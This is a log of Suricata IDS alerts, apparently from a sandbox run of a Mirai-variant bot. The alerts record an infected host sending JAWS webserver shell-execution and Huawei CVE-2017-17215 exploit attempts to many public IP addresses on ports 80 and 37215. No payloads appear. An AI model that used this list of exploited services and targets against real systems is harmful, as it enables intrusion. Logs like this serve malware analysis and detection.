              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:53966 -> 82.32.93.110:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:33700 -> 197.133.40.24:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:49810 -> 156.80.186.253:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:43492 -> 203.195.122.98:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:35530 -> 156.161.111.247:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:43492 -> 203.195.122.98:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:37834 -> 35.149.142.163:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:37834 -> 35.149.142.163:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:38760 -> 41.29.6.122:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:44860 -> 156.66.193.93:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33948 -> 13.108.32.211:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33948 -> 13.108.32.211:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:57966 -> 51.139.218.36:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:57966 -> 51.139.218.36:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56388 -> 166.138.238.35:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56388 -> 166.138.238.35:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49602 -> 216.213.46.231:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49602 -> 216.213.46.231:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:46296 -> 139.225.240.172:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:41992 -> 25.233.224.38:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:46296 -> 139.225.240.172:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:43514 -> 107.223.216.240:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:37202 -> 67.218.78.191:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:40134 -> 150.170.24.90:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:41992 -> 25.233.224.38:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:42392 -> 98.228.221.176:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:42392 -> 98.228.221.176:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:41766 -> 124.184.212.227:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:37202 -> 67.218.78.191:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:40134 -> 150.170.24.90:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:41766 -> 124.184.212.227:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:43514 -> 107.223.216.240:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49998 -> 62.3.220.66:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49998 -> 62.3.220.66:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:45680 -> 176.100.12.176:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:45680 -> 176.100.12.176:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:58308 -> 95.141.34.86:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:58308 -> 95.141.34.86:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:38036 -> 156.87.226.227:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:37782 -> 156.181.117.103:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:52372 -> 186.209.63.200:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:52372 -> 186.209.63.200:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:40210 -> 197.5.14.49:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:48546 -> 19.119.179.107:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:48546 -> 19.119.179.107:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49556 -> 32.109.104.6:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49556 -> 32.109.104.6:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33764 -> 9.119.226.185:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33764 -> 9.119.226.185:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:52170 -> 156.166.231.243:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:47682 -> 222.146.115.153:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:43058 -> 125.144.55.236:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:47682 -> 222.146.115.153:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:43058 -> 125.144.55.236:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:59318 -> 162.28.10.148:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:59318 -> 162.28.10.148:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:58146 -> 161.215.111.37:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:58146 -> 161.215.111.37:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:43710 -> 155.48.55.41:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:43710 -> 155.48.55.41:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49792 -> 74.137.199.231:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49792 -> 74.137.199.231:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:56370 -> 197.206.55.46:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:47526 -> 204.176.132.110:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:47526 -> 204.176.132.110:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:50816 -> 41.137.88.118:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:36766 -> 143.23.249.38:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:36766 -> 143.23.249.38:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:53468 -> 41.90.199.41:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33010 -> 207.26.197.36:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33010 -> 207.26.197.36:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:58172 -> 41.106.217.55:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:39476 -> 197.75.231.248:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:33738 -> 156.129.236.100:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:43732 -> 41.238.27.185:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:37248 -> 84.0.101.244:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:37248 -> 84.0.101.244:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:58936 -> 41.130.45.55:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:56738 -> 156.106.230.150:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:50898 -> 42.77.12.95:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:50898 -> 42.77.12.95:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:45022 -> 32.71.11.101:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:45022 -> 32.71.11.101:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:42064 -> 79.68.93.23:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:42064 -> 79.68.93.23:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:53626 -> 17.53.64.207:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:53626 -> 17.53.64.207:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56602 -> 126.182.35.205:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:41752 -> 180.247.222.119:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56602 -> 126.182.35.205:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:39428 -> 183.119.84.214:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:60086 -> 40.54.178.141:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:40192 -> 25.68.126.50:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:39428 -> 183.119.84.214:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:45620 -> 42.210.68.207:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:41752 -> 180.247.222.119:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:45620 -> 42.210.68.207:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:60086 -> 40.54.178.141:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:55504 -> 156.195.158.216:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:58574 -> 204.137.209.75:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:58574 -> 204.137.209.75:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:40888 -> 197.51.196.232:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:53464 -> 35.94.114.161:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:59440 -> 54.197.207.13:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:59440 -> 54.197.207.13:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:34012 -> 40.144.172.4:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:34012 -> 40.144.172.4:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:40176 -> 144.229.87.242:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:40176 -> 144.229.87.242:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:40192 -> 25.68.126.50:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:53464 -> 35.94.114.161:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:49716 -> 156.231.34.243:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:46724 -> 206.199.245.36:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:46724 -> 206.199.245.36:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:36514 -> 93.55.208.184:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:36514 -> 93.55.208.184:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:33982 -> 41.247.70.4:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:34564 -> 41.160.92.139:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:38700 -> 197.211.217.174:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:35342 -> 197.165.49.31:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:55982 -> 197.229.162.82:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:43636 -> 197.225.24.55:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:38374 -> 166.170.65.204:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33914 -> 130.194.192.131:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:38374 -> 166.170.65.204:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33914 -> 130.194.192.131:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33266 -> 191.252.64.221:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:46742 -> 187.194.10.196:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33266 -> 191.252.64.221:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:46742 -> 187.194.10.196:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:42240 -> 90.177.70.10:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:50898 -> 13.138.57.214:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56554 -> 145.56.156.195:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:50488 -> 200.200.243.56:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:43992 -> 23.137.87.167:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:42240 -> 90.177.70.10:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:50898 -> 13.138.57.214:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56554 -> 145.56.156.195:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:55376 -> 151.3.92.187:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:50488 -> 200.200.243.56:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:55376 -> 151.3.92.187:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:43992 -> 23.137.87.167:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33218 -> 27.157.203.196:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33218 -> 27.157.203.196:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:50216 -> 180.142.123.27:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:50216 -> 180.142.123.27:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:54372 -> 58.27.47.222:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:54372 -> 58.27.47.222:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:47328 -> 117.127.29.44:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:47328 -> 117.127.29.44:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:48144 -> 156.60.233.0:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:44992 -> 41.7.140.151:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:60952 -> 156.136.36.32:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:51524 -> 186.177.39.200:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:51524 -> 186.177.39.200:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:47236 -> 194.139.104.203:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:47236 -> 194.139.104.203:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:58230 -> 219.172.14.29:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:58230 -> 219.172.14.29:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:48066 -> 17.196.195.95:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:48066 -> 17.196.195.95:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:44120 -> 179.210.59.211:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49030 -> 166.123.231.179:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:44120 -> 179.210.59.211:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49030 -> 166.123.231.179:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:47862 -> 126.24.223.98:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:47862 -> 126.24.223.98:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:44422 -> 9.135.213.16:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56248 -> 220.183.243.172:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:44422 -> 9.135.213.16:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:38874 -> 193.2.130.245:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:36422 -> 50.52.226.195:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:38874 -> 193.2.130.245:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:36422 -> 50.52.226.195:80
